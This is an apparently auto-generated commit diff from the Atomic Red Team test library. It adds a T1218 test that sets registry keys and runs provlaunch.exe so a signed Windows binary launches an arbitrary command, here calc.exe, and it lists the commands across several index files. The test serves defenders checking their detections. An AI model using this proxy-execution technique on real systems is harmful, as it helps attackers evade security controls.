Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -166,6 +166,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon opt
 defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,14,Provlaunch.exe Executes Arbitrary Command via Registry Key,ab76e34f-28bf-441f-a39c-8db4835b89cc,command_prompt
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -105,6 +105,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon opt
 defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,14,Provlaunch.exe Executes Arbitrary Command via Registry Key,ab76e34f-28bf-441f-a39c-8db4835b89cc,command_prompt
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -229,6 +229,7 @@
   - Atomic Test #11: Lolbin Gpscript startup option [windows]
   - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
   - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
+  - Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
   - Atomic Test #1: Set a file's access timestamp [linux, macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -154,6 +154,7 @@
   - Atomic Test #11: Lolbin Gpscript startup option [windows]
   - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
   - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
+  - Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
   - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]

atomics/Indexes/index.yaml

@@ -9078,6 +9078,21 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Provlaunch.exe Executes Arbitrary Command via Registry Key
+      auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc
+      description: |
+        Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
+        - https://twitter.com/0gtweet/status/1674399582162153472
+        - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
+        Registry keys are deleted after successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
+          reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
+          c:\windows\system32\provlaunch.exe LOLBin
+        name: command_prompt
   T1038:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -7416,6 +7416,21 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Provlaunch.exe Executes Arbitrary Command via Registry Key
+      auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc
+      description: |
+        Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
+        - https://twitter.com/0gtweet/status/1674399582162153472
+        - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
+        Registry keys are deleted after successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
+          reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
+          c:\windows\system32\provlaunch.exe LOLBin
+        name: command_prompt
   T1038:
     technique:
       x_mitre_platforms:

atomics/T1218/T1218.md

@@ -32,6 +32,8 @@ Similarly, on Linux systems adversaries may abuse trusted binaries such as <code
 
 - [Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process](#atomic-test-13---lolbas-customshellhost-to-spawn-process)
 
+- [Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry Key](#atomic-test-14---provlaunchexe-executes-arbitrary-command-via-registry-key)
+
 
 <br/>
 
@@ -631,4 +633,37 @@ Remove-Item -Path #{dest_path} -Recurse -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry Key
+Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
+- https://twitter.com/0gtweet/status/1674399582162153472
+- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
+Registry keys are deleted after successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ab76e34f-28bf-441f-a39c-8db4835b89cc
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
+reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
+c:\windows\system32\provlaunch.exe LOLBin
+```
+
+
+
+
+
+
 <br/>